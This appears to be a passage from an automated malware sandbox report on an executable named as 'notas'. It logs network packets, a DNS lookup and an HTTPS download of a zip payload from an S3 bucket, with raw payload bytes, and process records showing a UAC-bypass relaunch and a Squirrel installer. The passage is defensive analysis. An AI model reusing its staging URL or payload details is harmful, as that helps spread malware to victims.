                                                                  Feb 23, 2024 15:43:25.369102001 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369124889 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369128942 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369148016 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369148016 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369160891 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369174004 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369205952 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369210958 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369220972 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369251013 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369257927 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369262934 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369297028 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369322062 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369339943 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369360924 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369371891 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369375944 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369390965 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369405985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369410992 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369421959 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369426966 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369442940 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369465113 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369476080 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369489908 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369507074 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369523048 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369528055 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369551897 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369565010 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369566917 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369577885 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369602919 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369616985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369622946 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369640112 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369649887 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369657993 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369664907 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369669914 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369689941 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369710922 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369720936 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369725943 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369744062 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369755030 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369760990 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369786024 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369790077 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369798899 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369803905 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369824886 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369826078 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369849920 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369853973 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369873047 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369877100 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369899988 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369904995 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369920969 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369931936 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369951963 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.369956017 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.369981050 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370001078 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370002985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370012045 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370031118 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370047092 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370052099 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370075941 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370089054 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370089054 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370106936 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370135069 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370138884 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370157003 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370161057 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370199919 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370199919 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370219946 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370220900 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370232105 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370248079 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370279074 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370279074 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370290995 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370317936 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370327950 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370332956 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370362043 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370373964 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370417118 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370457888 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370465994 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370501041 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370553017 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:25.370599985 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.370865107 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.381450891 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:25.381462097 CET443497043.5.232.21192.168.2.5

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Feb 23, 2024 15:43:22.002110004 CET5300353192.168.2.51.1.1.1
                                                                  Feb 23, 2024 15:43:22.096250057 CET53530031.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Feb 23, 2024 15:43:22.002110004 CET192.168.2.51.1.1.10x9a8cStandard query (0)awsserver903203232.s3.sa-east-1.amazonaws.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)awsserver903203232.s3.sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.21A (IP address)IN (0x0001)false
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.18A (IP address)IN (0x0001)false
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.50A (IP address)IN (0x0001)false
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.74A (IP address)IN (0x0001)false
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.234.171A (IP address)IN (0x0001)false
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.234.115A (IP address)IN (0x0001)false
                                                                  Feb 23, 2024 15:43:22.096250057 CET1.1.1.1192.168.2.50x9a8cNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.164.82A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • awsserver903203232.s3.sa-east-1.amazonaws.com

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.5497043.5.232.214434284C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-02-23 14:43:22 UTC314OUTGET /webTc.zip HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: awsserver903203232.s3.sa-east-1.amazonaws.com
                                                                  Connection: Keep-Alive
                                                                  2024-02-23 14:43:23 UTC443INHTTP/1.1 200 OK
                                                                  x-amz-id-2: bni5vDrEqkLqQoQwMfe5AG8GcDUzsJ6oKpv/EDGtnDIAyKOpuIOc67XZb+8QD77zNULNtJH/3fSFU9duJKcK7znLMdmSyhyb
                                                                  x-amz-request-id: 4X4V6YSJJ57770R7
                                                                  Date: Fri, 23 Feb 2024 14:43:23 GMT
                                                                  Last-Modified: Fri, 23 Feb 2024 03:17:57 GMT
                                                                  ETag: "88ec493f2a48d234120348aeab6d3808"
                                                                  x-amz-server-side-encryption: AES256
                                                                  Accept-Ranges: bytes
                                                                  Content-Type: application/zip
                                                                  Server: AmazonS3
                                                                  Content-Length: 8764801
                                                                  Connection: close
                                                                  2024-02-23 14:43:23 UTC7657INData Raw: 48 7e 88 45 61 e7 06 6b 79 4a f7 5f f8 a9 83 d3 0e 40 f5 ca da 03 3c f4 3d af 80 7d 88 5d 7f 8a 41 1f 29 d6 57 f8 f1 a0 0a 19 af 22 bb 67 62 80 fd d8 73 ca 0b 2e 6c 52 f8 d5 34 70 b8 d5 85 65 6b 4a 19 84 f3 e2 d0 ef a6 90 d7 6e d4 17 fa 71 fb 7e dd 50 0a b3 b1 d7 1c b5 28 4a 21 ef c9 f8 76 0e 4d 61 3e ff 3c 9b 2b 28 fa 72 a0 3e 15 cc b2 c3 86 46 c1 8b 67 38 af ed 6b 20 65 ce cc d4 9e 52 62 91 a2 53 cb f7 93 e8 77 96 e3 ee 5e ec 99 b5 2c a9 60 93 9c ef 54 c3 bc 39 60 7a 43 d0 c0 d7 3f 92 33 37 88 01 ca 5f 16 59 26 21 0b 84 4c b3 49 d8 bb 8c 48 1e 71 0f f7 33 7b 53 d6 48 cf d7 86 fc f5 ca de 0b 02 44 92 76 31 6b 1d 5b bd 5e 6e ae fb 2d bd dc 06 01 1c 4a ee 03 d7 ed 57 00 63 13 23 79 0e 47 2c 15 55 a2 d3 e3 fb 28 56 ca b9 a7 65 02 ec 45 4d 9d d4 0c 2d 21 66
                                                                  Data Ascii: H~EakyJ_@<=}]A)W"gbs.lR4pekJnq~P(J!vMa><+(r>Fg8k eRbSw^,`T9`zC?37_Y&!LIHq3{SHDv1k[^n-JWc#yG,U(VeEM-!f
                                                                  2024-02-23 14:43:23 UTC16384INData Raw: b5 df 96 e7 68 7e c9 06 b5 c5 79 3c 37 e5 01 f6 f4 9b c6 16 7e 5c 69 34 2e 91 58 1b df f0 5a 84 11 27 69 bc 89 cb 81 88 ce 63 47 a0 ca 3a 23 25 68 21 48 24 ac f5 44 cd 6e 2b 34 ff fd f2 a3 07 7b 5b 22 b3 a0 4c 35 39 5f 5d 9b 3c e7 8b 41 73 d0 9a 9b 80 8a 03 b2 6a c0 52 4b 30 c9 cc fc c2 d1 d3 f1 ec 9c f7 5f 48 66 bc a2 08 a7 4b 03 38 80 f9 65 07 64 39 81 09 e9 3a de d4 d7 8d b5 3a ef 8e bc 17 26 41 30 5c bd b5 ac 99 ac 0d 08 41 0b 2d d2 34 33 8d 63 f0 25 88 60 f3 61 c4 9b f8 69 cd 6a 0c cf 6a 4b 3b 95 17 2f 5d 99 e5 5e 22 e8 54 40 9b 89 a0 16 ea 3d 01 e7 c7 f8 0f aa 5e 84 fe 38 c5 24 f1 44 3f 47 1c b2 32 d7 9c 4e a4 90 e7 fb 62 7a 8c b8 b4 85 d1 7b 93 27 0b 05 6b 86 71 89 38 7b 57 9a ea e6 6a ef 31 f3 8a 30 8f 70 82 c6 62 5c da db 21 42 97 d3 19 37 1e 86
                                                                  Data Ascii: h~y<7~\i4.XZ'icG:#%h!H$Dn+4{["L59_]<AsjRK0_HfK8ed9::&A0\A-43c%`aijjK;/]^"T@=^8$D?G2Nbz{'kq8{Wj10pb\!B7
                                                                  2024-02-23 14:43:23 UTC1024INData Raw: 47 58 84 31 93 63 e7 bc e0 df 3d c1 be 47 70 ba 0f 33 7f 1c 7f f7 b4 f8 3f 9c 73 8b 3a 31 5d 52 d9 71 df 2e 39 be 73 31 88 5b 1d 64 b5 51 33 be 95 5a af ac 30 da 29 d4 f3 80 61 b4 76 df 6e 99 8a 87 fe 02 db 4d 14 5c b9 67 24 72 d9 40 ac 75 3c 7f ea c6 1a 4b c7 f3 a5 42 d0 90 c5 ed 45 d1 52 e2 59 4d 72 b1 35 a3 e9 1e c5 5e f6 46 4c 2b 37 87 b3 7e 94 ed 7d 65 0a 17 2b e6 c4 77 cc 1d c8 1b 1c c3 76 a6 09 12 fc 73 03 0b 0e eb 33 5a 61 ac 4e a5 90 04 d6 24 11 69 76 e5 a0 ad 8d 5c 21 d0 e7 c8 c5 bd 40 ab 66 93 80 a9 a8 d5 92 c0 c4 4e 00 3d fb 66 20 ac 41 1f c8 6c 0e 0d 51 c1 8a 2d 3c 1a 14 f7 c6 06 ce ee b5 57 a2 37 51 e4 cc 77 0d 03 fd 8c 56 b9 5b a7 51 d8 8d ec 0f 9e 25 6c 71 0b 5d 96 ad 54 13 73 11 3e 6c ab 2f c5 be 32 45 b3 1a c0 60 25 a3 99 c5 80 cc e8 10
                                                                  Data Ascii: GX1c=Gp3?s:1]Rq.9s1[dQ3Z0)avnM\g$r@u<KBERYMr5^FL+7~}e+wvs3ZaN$iv\!@fN=f AlQ-<W7QwV[Q%lq]Ts>l/2E`%
                                                                  2024-02-23 14:43:23 UTC16384INData Raw: fd 71 47 b4 28 b1 84 61 a2 d9 76 8d ff 13 b0 e6 d5 a2 a6 6a dd f0 01 cf e0 7c a5 a1 ab 7c b9 cc b3 6c 1d ad f6 ee ca ec fb 86 dd 65 9c 60 97 e8 75 1f 84 cd c6 36 98 f1 d9 c8 42 61 30 0a 0d bc 5a b2 fa 54 c6 6d 82 e5 41 d5 de af 1e ae 98 22 31 70 9a 39 88 d7 a1 8c d6 a3 77 70 cf 30 09 49 4a c7 2f 83 5f 4a a4 98 ef 32 00 f3 0b 3c 56 ea 23 f3 09 d7 55 5c ad fc 16 5a 36 f3 a3 7d 7c 31 cc dd 30 01 31 f1 f2 08 95 cf 4b 17 cc 58 ac 1e 97 c3 a7 26 7b 43 2d ed 6d 66 f6 11 f0 c7 2b d7 cf 61 74 12 b0 60 cd ae db e2 31 f5 9a 05 7c 55 85 ce a4 50 1f d0 07 f3 45 bb 17 00 16 db 06 8c d9 22 1d f0 69 41 7f b1 c4 84 0e 89 b1 35 de 1d b0 8d c2 5c af 7c 29 fb 55 02 6b 98 a3 ba 9c bd 24 82 c7 b4 53 36 67 fb 53 65 39 21 af b1 52 d8 39 9e fc 7d 51 fd 2c f6 bd c4 51 38 e7 1a d8
                                                                  Data Ascii: qG(avj||le`u6Ba0ZTmA"1p9wp0IJ/_J2<V#U\Z6}|101KX&{C-mf+at`1|UPE"iA5\|)Uk$S6gSe9!R9}Q,Q8
                                                                  2024-02-23 14:43:23 UTC1024INData Raw: d9 48 57 15 3d b0 f1 dd df 4c 4c 2c 0b bf fb 44 c8 2d de 3a 2b 68 d6 ba 78 97 c1 19 cb 92 b0 f6 e4 e6 c7 42 dd 13 7f f3 8b b6 fe 3a 2d 57 d2 8a 42 bd f2 bd 37 e8 d2 dc be be c5 c9 f9 08 c8 17 ef ab d2 0f 00 31 b4 02 17 3b 12 5c 53 31 70 d6 0e 42 a6 c4 5c 37 b4 e2 37 ff e3 e3 2d 44 7b 75 a5 0d 80 55 63 de ed f4 e5 28 90 50 09 88 b9 30 e2 f8 b0 6d aa a3 40 21 75 a2 fc d9 8f f3 d0 c1 41 cf a6 7f 40 f1 64 8e 0b 5f 5c ee 8e 6f 16 31 d3 b2 57 b7 cd a2 ff 5d 78 2f 3d 20 01 28 11 05 b4 ba ee ce be 4a 90 35 63 5a ed e9 cf 1f 41 77 12 64 af e7 62 5e 28 14 b7 46 e2 1f 26 09 0c e1 11 5a 31 a1 64 38 a5 0b 56 3c 22 11 37 55 95 d0 7b 1a 01 80 d3 83 f8 9d ed 19 99 b2 29 54 e0 a6 a6 47 50 e6 0a 24 55 18 d6 f6 84 bd eb ad 0e 28 6f 54 1c 39 5d 7e 8c c5 e0 c3 21 90 93 a2 6b
                                                                  Data Ascii: HW=LL,D-:+hxB:-WB71;\S1pB\77-D{uUc(P0m@!uA@d_\o1W]x/= (J5cZAwdb^(F&Z1d8V<"7U{)TGP$U(oT9]~!k
                                                                  2024-02-23 14:43:23 UTC16384INData Raw: a7 90 f8 b6 cd 46 d4 e7 27 ce 06 3c 07 41 d7 1f 99 81 c5 83 01 10 84 a2 71 c7 b7 90 de d8 33 23 f6 c1 5c c0 56 6d 56 c2 8a 56 28 b7 6e 47 6e 70 87 a9 24 05 6f 8e 05 20 14 01 a6 d6 28 f6 e8 1a f0 34 80 46 0d a1 2b 57 a5 b5 9c 83 dc cb ac 67 bf 1f fd 74 94 97 d9 8e 1f fe b8 44 b8 3c 65 14 6f e7 14 38 52 22 38 a1 12 ed c8 70 38 13 ff 9b 7d 2f ac 12 90 02 81 b3 a5 8f 56 f4 0b 3f b8 34 9a 28 50 07 8e be 88 eb 17 dd f0 02 16 4c 9c e4 1d 23 cf e2 ea 2d 27 63 09 bc 69 7a 67 5d ac 44 07 b2 e2 53 8a 82 f8 39 15 07 17 02 8c 94 d8 c4 e3 8d c7 9f 1c 4f 22 51 a4 73 c1 cc 42 3d ff 59 74 40 d3 b2 9c d5 64 c4 96 6b 1c b3 e6 b8 23 d3 93 31 71 ba df d2 da 45 cb 3d 0c 03 96 09 6b e9 b3 02 1a bd 55 d8 45 c6 16 9a 59 8a be 70 b0 4b 2a 0d 45 d9 b8 47 37 36 eb 88 00 61 cd 4b 88
                                                                  Data Ascii: F'<Aq3#\VmVV(nGnp$o (4F+WgtD<eo8R"8p8}/V?4(PL#-'cizg]DS9O"QsB=Yt@dk#1qE=kUEYpK*EG76aK
                                                                  2024-02-23 14:43:23 UTC1024INData Raw: 24 6e 5e b9 9b 92 29 68 bf a2 0a f9 1a 70 45 53 e3 c5 df 50 a4 63 11 03 bd 49 e2 f1 27 6f 1c 13 82 1f 60 2f 8d ac f4 eb fb a2 bc 6d d5 7a db f6 a5 09 c0 22 27 92 41 41 48 f4 f0 cf 39 38 b9 8f fb e4 5c f6 b2 0c 61 bc a8 5d 59 fc fa 18 05 8b d9 49 d5 98 09 1d c7 e4 8a 69 f8 22 bb 66 15 5f f4 20 c2 ee c9 38 d0 f0 90 eb 2a 72 ae 49 9e 6d 4c e6 d5 d3 0e 17 10 42 4a 92 a9 01 76 96 50 d3 bb c2 6c 9a 51 e8 47 32 e2 98 48 40 91 56 a9 57 29 b1 d2 f6 ef 11 97 51 7a 83 70 8f b1 3a 75 54 8a bd 21 6a ab 7a f9 fc 0d 65 e7 35 55 0a 48 b7 0a 1f fd 32 30 e4 e6 95 a1 4a 9b a9 e0 81 b3 dd aa cd 01 b3 fb 17 1d 70 a9 1f 7a 61 09 7e b4 88 b7 ab 97 22 41 51 ad 89 37 d7 ee 07 ca 47 a5 d0 b4 42 29 31 94 c2 f8 01 35 f1 bc 80 ae d4 2a 35 a5 d7 5c cb 6e 87 9c 18 80 c3 b5 3d a8 f0 e9
                                                                  Data Ascii: $n^)hpESPcI'o`/mz"'AAH98\a]YIi"f_ 8*rImLBJvPlQG2H@VW)Qzp:uT!jze5UH20Jpza~"AQ7GB)15*5\n=
                                                                  2024-02-23 14:43:23 UTC16384INData Raw: 18 9f a5 bc 17 09 c8 5c 05 25 93 3e c3 1a 1d 87 4a 5b ca 26 85 77 a6 20 0c 5e 33 b8 f1 16 93 ab 30 09 5b be 43 23 32 3a 79 0f 5b 12 92 34 aa 44 f3 ee 4f 45 19 9c 11 07 01 17 92 99 7d 11 c6 ea b7 60 f9 a2 56 51 c2 55 66 e1 4a 11 8d d6 21 86 ad d1 04 12 d9 bc 2d 56 b7 47 85 bf 82 aa cd ac a3 b0 ba ed 61 98 e8 ac 82 1f dc 63 28 7b 3f ba 73 fe 67 b7 e2 eb 4a d5 99 44 f3 43 a9 17 08 8a 5c 43 ab 17 66 8e 00 e4 c2 72 de cd 27 c6 b9 bb 85 db f5 e3 20 e0 43 7e 9c 3e b3 9c 2d 76 44 09 2d 2b 9f 06 ba 08 80 4b 06 b1 71 a6 62 2f 1c 58 73 3f 3e 22 ab 44 23 2c f1 fb aa 31 6c bf c5 01 ba 6a 79 a3 3b 69 65 9c f3 e7 03 37 bb 63 30 c9 5b 1d cd be 77 db e8 a7 6b 95 21 f7 f9 a3 3c 9e 9e f5 80 3d 84 e9 53 b2 05 c0 44 bf b5 79 c6 e3 67 ca 49 6e ed d3 94 ad 59 05 ed 56 a2 fb de
                                                                  Data Ascii: \%>J[&w ^30[C#2:y[4DOE}`VQUfJ!-VGac({?sgJDC\Cfr' C~>-vD-+Kqb/Xs?>"D#,1ljy;ie7c0[wk!<=SDygInYV
                                                                  2024-02-23 14:43:23 UTC1024INData Raw: a1 ff 46 df fd 5c 6d cd f3 fd b5 ff df f2 9c 93 f2 1d 3c 04 f1 29 a9 21 11 3e 60 3c 00 4a c1 a6 e0 5b be 60 49 11 35 34 c8 3f e8 4f 38 26 f8 94 88 16 b9 b4 a4 b2 f8 63 a4 d0 c7 6d 04 65 ed e5 21 9f 6f a5 cc 2f 95 84 7f ae 49 02 c5 f4 0a 07 26 f7 03 b4 08 93 83 a9 69 98 d1 a1 22 98 14 60 7d 71 d9 bc 55 a2 f8 c2 94 eb 19 c1 c3 3f ca fc 6d c6 fd d8 3f 44 9a d4 43 39 ce 99 a1 12 6b f9 51 0d 79 69 2e f1 2a 54 57 9f 13 54 50 80 3b 39 95 06 71 16 2d b2 bb f5 b1 f8 a9 3a 37 d0 47 38 4b cb e7 0a 82 7a c5 27 5a c6 51 8f bb ad 59 f7 0c 51 00 16 aa 44 2b 5c 9d bd 5a e0 c7 04 85 ef 26 50 86 b3 96 20 a8 ba 0b 21 4c 2d b0 d3 2b 05 2b a4 27 fb 5d a2 10 c9 75 c3 1d b7 9f e6 6b 81 04 1c 8b a5 9c 5e ca e6 55 6a 1e fe 82 86 32 e5 f2 70 c2 c5 ee 31 01 8e ea 6f 66 03 c9 d1 8d
                                                                  Data Ascii: F\m<)!>`<J[`I54?O8&cme!o/I&i"`}qU?m?DC9kQyi.*TWTP;9q-:7G8Kz'ZQYQD+\Z&P !L-++']uk^Uj2p1of
                                                                  2024-02-23 14:43:23 UTC3176INData Raw: 38 41 58 b0 55 eb 14 d0 63 b7 f1 72 b6 b4 0e bd d0 1e 3d 7a f5 86 a7 86 ab 07 24 84 41 62 26 16 36 44 83 08 c7 2a 71 1d 84 62 98 07 d7 40 79 1e cd fe 89 82 3a 07 0e b4 dd 09 82 24 9b 6e c7 8a 2b b1 d7 1b c3 a6 6b 80 97 12 72 95 fb 28 58 ed b5 05 f1 2d 98 13 dc f6 1c 53 5d d5 c2 aa 5a 51 5e c4 d5 25 04 d5 cc 79 2d 13 fb a8 57 19 b4 39 0a 4b bc 2a 21 9b fd b9 fc 4f 11 13 5b ba 8c b3 37 80 7d 63 3b 23 9d 2b ce fe 41 5c 3e e8 4d 67 a0 b9 93 51 3a 57 b4 d0 b6 dd 7a 7c 08 fd b4 3b 66 9d c8 27 28 9a 05 d9 f1 46 70 87 3d 63 1a f7 e5 5d e7 4d a1 ba be 61 0a 41 3e 5c 3a 17 04 39 73 2f 43 d6 2e cd 5c 1d b6 3f 36 3d 36 50 1d a7 a9 a0 3e a4 59 7a fb e0 f8 ce dc 68 71 07 fd 72 67 fc f5 70 77 d0 68 e8 93 1d 39 a8 4a e2 30 24 cc 40 e8 16 e6 04 e7 f1 a5 a9 14 3a a0 bf a2
                                                                  Data Ascii: 8AXUcr=z$Ab&6D*qb@y:$n+kr(X-S]ZQ^%y-W9K*!O[7}c;#+A\>MgQ:Wz|;f'(Fp=c]MaA>\:9s/C.\?6=6P>Yzhqrgpwh9J0$@:


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:15:43:17
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  Imagebase:0x220000
                                                                  File size:2'102'272 bytes
                                                                  MD5 hash:A548469585481A1B7F98C9B09D271349
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:15:43:17
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC
                                                                  Imagebase:0x220000
                                                                  File size:2'102'272 bytes
                                                                  MD5 hash:A548469585481A1B7F98C9B09D271349
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:15:43:17
                                                                  Start date:23/02/2024
                                                                  Path:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC
